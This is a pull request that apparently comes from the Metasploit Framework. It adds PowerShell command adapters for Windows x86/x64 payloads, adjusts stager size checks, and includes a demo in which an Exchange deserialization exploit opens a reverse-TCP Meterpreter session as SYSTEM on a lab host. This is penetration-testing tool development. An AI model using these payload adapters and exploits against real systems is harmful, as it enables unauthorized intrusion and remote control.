### PR TITLE
Add Powershell Command Adapter

### DIFF
--- a/lib/msf/core/payload/adapter.rb
+++ b/lib/msf/core/payload/adapter.rb
@@ -25,10 +25,25 @@ module Msf::Payload::Adapter
     merge_info_adapted('Platform', info, opt)
   end
 
-  # due to how payloads are made by combining all the modules, this is necessary to ensure that the adapted information
-  # isn't placed into the final object
+  # Due to how payloads are made by combining all the modules, this is necessary to ensure that the adapted information
+  # isn't placed into the final object. The current implementation requires that AdaptedArch/AdaptedPlatform are single
+  # entries and not arrays of entries like the normal Arch/Platform info keys are.
   def merge_info_adapted(key, info, opt)
-    info[key] = [] unless info[key]
-    info[key] << opt unless opt == info["Adapted#{key}"] || info[key].include?(opt)
+    if info[key] && !info[key].kind_of?(Array)
+      info[key] = [ info[key] ]
+    elsif !info[key]
+      info[key] = []
+    end
+
+    if opt.kind_of?(Array)
+      opt.each do |opt_val|
+        next if info["Adapted#{key}"] == opt_val
+        next if info[key].include?(opt_val)
+
+        info[key] << opt_val
+      end
+    elsif opt != info["Adapted#{key}"] && !info[key].include?(opt)
+      info[key] << opt
+    end
   end
 end

--- a/lib/msf/core/payload/windows/bind_named_pipe.rb
+++ b/lib/msf/core/payload/windows/bind_named_pipe.rb
@@ -39,7 +39,7 @@ module Payload::Windows::BindNamedPipe
     }
 
     # Generate the advanced stager if we have space
-    unless self.available_space.nil? || required_space > self.available_space
+    if self.available_space && cached_size && required_space <= self.available_space
       conf[:reliable] = true
       conf[:exitfunk] = datastore['EXITFUNC']
     end

--- a/lib/msf/core/payload/windows/bind_tcp.rb
+++ b/lib/msf/core/payload/windows/bind_tcp.rb
@@ -28,7 +28,7 @@ module Payload::Windows::BindTcp
     }
 
     # Generate the more advanced stager if we have the space
-    if self.available_space && required_space <= self.available_space
+    if self.available_space && cached_size && required_space <= self.available_space
       conf[:exitfunk] = datastore['EXITFUNC']
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/windows/bind_tcp_rc4.rb
+++ b/lib/msf/core/payload/windows/bind_tcp_rc4.rb
@@ -27,7 +27,7 @@ module Payload::Windows::BindTcpRc4
     }
 
     # Generate the more advanced stager if we have the space
-    if self.available_space && required_space <= self.available_space
+    if self.available_space && cached_size && required_space <= self.available_space
       conf[:exitfunk] = datastore['EXITFUNC']
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -43,7 +43,7 @@ module Payload::Windows::ReverseHttp
     }
 
     # Add extra options if we have enough space
-    if self.available_space.nil? || required_space <= self.available_space
+    if self.available_space.nil? || (cached_size && required_space <= self.available_space)
       conf[:url]            = luri + generate_uri(opts)
       conf[:exitfunk]       = ds['EXITFUNC']
       conf[:ua]             = ds['HttpUserAgent']

--- a/lib/msf/core/payload/windows/reverse_named_pipe.rb
+++ b/lib/msf/core/payload/windows/reverse_named_pipe.rb
@@ -35,7 +35,7 @@ module Payload::Windows::ReverseNamedPipe
     }
 
     # Generate the advanced stager if we have space
-    unless self.available_space.nil? || required_space > self.available_space
+    if self.available_space && cached_size && required_space <= self.available_space
       conf[:exitfunk] = datastore['EXITFUNC']
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/windows/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp.rb
@@ -38,7 +38,7 @@ module Payload::Windows::ReverseTcp
     }
 
     # Generate the advanced stager if we have space
-    if self.available_space && required_space <= self.available_space
+    if self.available_space && cached_size && required_space <= self.available_space
       conf[:exitfunk] = ds['EXITFUNC']
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/windows/reverse_tcp_dns.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp_dns.rb
@@ -34,7 +34,7 @@ module Payload::Windows::ReverseTcpDns
     }
 
     # Generate the advanced stager if we have space
-    if self.available_space && required_space <= self.available_space
+    if self.available_space && cached_size && required_space <= self.available_space
       conf[:exitfunk] = datastore['EXITFUNC']
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/windows/reverse_tcp_rc4.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp_rc4.rb
@@ -29,7 +29,7 @@ module Payload::Windows::ReverseTcpRc4
     }
 
     # Generate the advanced stager if we have space
-    if self.available_space && required_space <= self.available_space
+    if self.available_space && cached_size && required_space <= self.available_space
       conf[:exitfunk] = datastore['EXITFUNC']
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/windows/reverse_tcp_rc4_dns.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp_rc4_dns.rb
@@ -29,7 +29,7 @@ module Payload::Windows::ReverseTcpRc4Dns
     }
 
     # Generate the advanced stager if we have space
-    if self.available_space && required_space <= self.available_space
+    if self.available_space && cached_size && required_space <= self.available_space
       conf[:exitfunk] = datastore['EXITFUNC']
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/windows/reverse_udp.rb
+++ b/lib/msf/core/payload/windows/reverse_udp.rb
@@ -25,7 +25,7 @@ module Payload::Windows::ReverseUdp
     }
 
     # Generate the advanced stager if we have space
-    unless self.available_space.nil? || required_space > self.available_space
+    if self.available_space && cached_size && required_space <= self.available_space
       conf[:exitfunk] = datastore['EXITFUNC']
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/windows/reverse_win_http.rb
+++ b/lib/msf/core/payload/windows/reverse_win_http.rb
@@ -34,7 +34,7 @@ module Payload::Windows::ReverseWinHttp
     }
 
     # Add extra options if we have enough space
-    if self.available_space.nil? || required_space <= self.available_space
+    if self.available_space.nil? || (cached_size && required_space <= self.available_space)
       conf[:uri]              = luri + generate_uri
       conf[:exitfunk]         = ds['EXITFUNC']
       conf[:verify_cert_hash] = opts[:verify_cert_hash]

--- a/lib/msf/core/payload/windows/x64/bind_named_pipe_x64.rb
+++ b/lib/msf/core/payload/windows/x64/bind_named_pipe_x64.rb
@@ -39,7 +39,7 @@ module Payload::Windows::BindNamedPipe_x64
     }
 
     # Generate the advanced stager if we have space
-    unless self.available_space.nil? || required_space > self.available_space
+    if self.available_space && cached_size && required_space <= self.available_space
       conf[:reliable] = true
       conf[:exitfunk] = datastore['EXITFUNC']
     end

--- a/lib/msf/core/payload/windows/x64/bind_tcp_rc4_x64.rb
+++ b/lib/msf/core/payload/windows/x64/bind_tcp_rc4_x64.rb
@@ -26,7 +26,7 @@ module Payload::Windows::BindTcpRc4_x64
     }
 
     # Generate the advanced stager if we have space
-    if self.available_space && required_space <= self.available_space
+    if self.available_space && cached_size && required_space <= self.available_space
       conf[:exitfunk] = datastore['EXITFUNC']
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/windows/x64/bind_tcp_x64.rb
+++ b/lib/msf/core/payload/windows/x64/bind_tcp_x64.rb
@@ -26,7 +26,7 @@ module Payload::Windows::BindTcp_x64
     }
 
     # Generate the more advanced stager if we have the space
-    if self.available_space && required_space <= self.available_space
+    if self.available_space && cached_size && required_space <= self.available_space
       conf[:exitfunk] = datastore['EXITFUNC']
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/windows/x64/reverse_http_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_http_x64.rb
@@ -48,7 +48,7 @@ module Payload::Windows::ReverseHttp_x64
     }
 
     # add extended options if we do have enough space
-    if self.available_space.nil? || required_space <= self.available_space
+    if self.available_space.nil? || (cached_size && required_space <= self.available_space)
       conf[:url]        = luri + generate_uri(opts)
       conf[:exitfunk]   = ds['EXITFUNC']
       conf[:ua]         = ds['HttpUserAgent']

--- a/lib/msf/core/payload/windows/x64/reverse_named_pipe_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_named_pipe_x64.rb
@@ -34,7 +34,7 @@ module Payload::Windows::ReverseNamedPipe_x64
     }
 
     # Generate the advanced stager if we have space
-    unless self.available_space.nil? || required_space > self.available_space
+    if self.available_space && cached_size && required_space <= self.available_space
       conf[:exitfunk] = datastore['EXITFUNC']
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/windows/x64/reverse_tcp_rc4_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_tcp_rc4_x64.rb
@@ -28,7 +28,7 @@ module Payload::Windows::ReverseTcpRc4_x64
     }
 
     # Generate the advanced stager if we have space
-    if self.available_space && required_space <= self.available_space
+    if self.available_space && cached_size && required_space <= self.available_space
       conf[:exitfunk] = datastore['EXITFUNC']
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/windows/x64/reverse_tcp_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_tcp_x64.rb
@@ -35,7 +35,7 @@ module Payload::Windows::ReverseTcp_x64
     }
 
     # Generate the advanced stager if we have space
-    if self.available_space && required_space <= self.available_space
+    if self.available_space && cached_size && required_space <= self.available_space
       conf[:exitfunk] = datastore['EXITFUNC']
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb
@@ -35,7 +35,7 @@ module Payload::Windows::ReverseWinHttp_x64
     }
 
     # Add extra options if we have enough space
-    if self.available_space.nil? || required_space <= self.available_space
+    if self.available_space.nil? || (cached_size && required_space <= self.available_space)
       conf[:uri]              = luri + generate_uri
       conf[:exitfunk]         = ds['EXITFUNC']
       conf[:verify_cert_hash] = opts[:verify_cert_hash]

--- a/lib/msf/core/payload_set.rb
+++ b/lib/msf/core/payload_set.rb
@@ -462,6 +462,7 @@ protected
     aparts = aname.split('/')
     pparts = pname.split('/')
     pparts.shift if aparts.last.start_with?(pparts.first)
+    aparts.each { |apart| pparts.delete(apart) if pparts.include?(apart) }
 
     (aparts + pparts).join('/')
   end

--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -65,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'PowerShell', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
           [ 'Native upload', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
           [ 'MOF upload', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
-          [ 'Command', { 'Arch' => [ARCH_CMD] } ]
+          [ 'Command', { 'Arch' => [ARCH_CMD], 'Payload' => { 'Space' => 8191 } } ]
         ],
       'DefaultTarget'  => 0,
       # For the CVE, PsExec was first released around February or March 2001

--- a/modules/payloads/adapters/cmd/windows/powershell.rb
+++ b/modules/payloads/adapters/cmd/windows/powershell.rb
@@ -1,0 +1,32 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  include Msf::Payload::Adapter
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Powershell Exec',
+        'Description' => 'Execute an x86 payload from a command via PowerShell',
+        'Author' => 'Spencer McIntyre',
+        'Platform' => 'win',
+        'Arch' => ARCH_CMD,
+        'License' => MSF_LICENSE,
+        'AdaptedArch' => ARCH_X86,
+        'AdaptedPlatform' => 'win',
+        'RequiredCmd' => 'powershell'
+      )
+    )
+  end
+
+  def generate
+    payload = super
+
+    cmd_psh_payload(payload, ARCH_X86, remove_comspec: true)
+  end
+end

--- a/modules/payloads/adapters/cmd/windows/powershell.rb
+++ b/modules/payloads/adapters/cmd/windows/powershell.rb
@@ -29,4 +29,10 @@ module MetasploitModule
 
     cmd_psh_payload(payload, ARCH_X86, remove_comspec: true)
   end
+
+  def generate_payload_uuid(conf = {})
+    conf[:arch] ||= module_info['AdaptedArch']
+    conf[:platform] ||= module_info['AdaptedPlatform']
+    super
+  end
 end

--- a/modules/payloads/adapters/cmd/windows/powershell/x64.rb
+++ b/modules/payloads/adapters/cmd/windows/powershell/x64.rb
@@ -1,0 +1,32 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  include Msf::Payload::Adapter
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Powershell Exec',
+        'Description' => 'Execute an x64 payload from a command via PowerShell',
+        'Author' => 'Spencer McIntyre',
+        'Platform' => 'win',
+        'Arch' => ARCH_CMD,
+        'License' => MSF_LICENSE,
+        'AdaptedArch' => ARCH_X64,
+        'AdaptedPlatform' => 'win',
+        'RequiredCmd' => 'powershell'
+      )
+    )
+  end
+
+  def generate
+    payload = super
+
+    cmd_psh_payload(payload, ARCH_X64, remove_comspec: true)
+  end
+end

--- a/modules/payloads/adapters/cmd/windows/powershell/x64.rb
+++ b/modules/payloads/adapters/cmd/windows/powershell/x64.rb
@@ -29,4 +29,10 @@ module MetasploitModule
 
     cmd_psh_payload(payload, ARCH_X64, remove_comspec: true)
   end
+
+  def generate_payload_uuid(conf = {})
+    conf[:arch] ||= module_info['AdaptedArch']
+    conf[:platform] ||= module_info['AdaptedPlatform']
+    super
+  end
 end


### PR DESCRIPTION
This builds on the work in #16186 by adding ARCH_X64 and ARCH_X86 to ARCH_CMD adapters for the Windows platform, using Powershell. The adapters use the existing `cmd_psh_payload` library method to perform the conversion. This means that module authors will not need to add the explicit "PowerShell Stager" target which has been a common convention for a while. You can search for exploits with targets named "Windows Powershell" and "Powershell Stager" where the module author had to handle the conversion by hand. With this in place, that extra work won't be necessary anymore.

Tested with the Command target in `windows/smb/psexec` as well as `windows/http/exchange_chainedserializationbinder_denylist_typo_rce`

In the diff, there's a bunch of modules updated to also check that the `cached_size` is not `nil` which fixed an issue that came up while testing. It's necessary to avoid the branch if there isn't a cached size, as is the case with the adapted payloads.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] Use one of the new, adapted payloads
    - [x] Generate the command, start a handler and run it to see that it works
- [x] Test an existing module that can deliver an ARCH_CMD payload
    - [x] See that the new payload is compatible (unless there's a size constraint)
    - [x] See that the exploit works with the new payload
- [x] See that the session once opened, behaves as expected (the platform and arch are set correctly)

## Demo

This example uses the existing `windows/http/exchange_chainedserializationbinder_denylist_typo_rce` module and its "Windows Command" target (which obsoleted the "PowerShell Stager" target).

```
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options 

Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  Password1        yes       The password to use to authenticate to the Exchange server
   HttpUsername  aliddle          yes       The username to log into the Exchange server as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        192.168.159.42   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT         443              yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT       8080             yes       The local port to listen on.
   SSL           true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI     /                yes       Base path
   URIPATH                        no        The URI to use for this exploit (default is random)
   VHOST                          no        HTTP server virtual host


Payload options (cmd/windows/powershell/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Command


msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > run

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is an Exchange Server!
[+] The target appears to be vulnerable. Exchange Server 15.1.2375.7 is a vulnerable version!
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAAD9j/m9iNuTRpA5mrD5EV0AAAA2pZiS
[+] ID value for Inbox folder is AQMkADU1ADBhYjYzMi02MTQ3LTRlOTEtYjU1ADAtN2M0ZDBhYjYzODVlAC4AAAMhko4gUQEoR6mlLklj/zwrAQD9j/m9iNuTRpA5mrD5EV0AAAMBDAAAAA==
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[*] Sending stage (175174 bytes) to 192.168.250.237
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:54917) at 2022-05-09 12:23:22 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
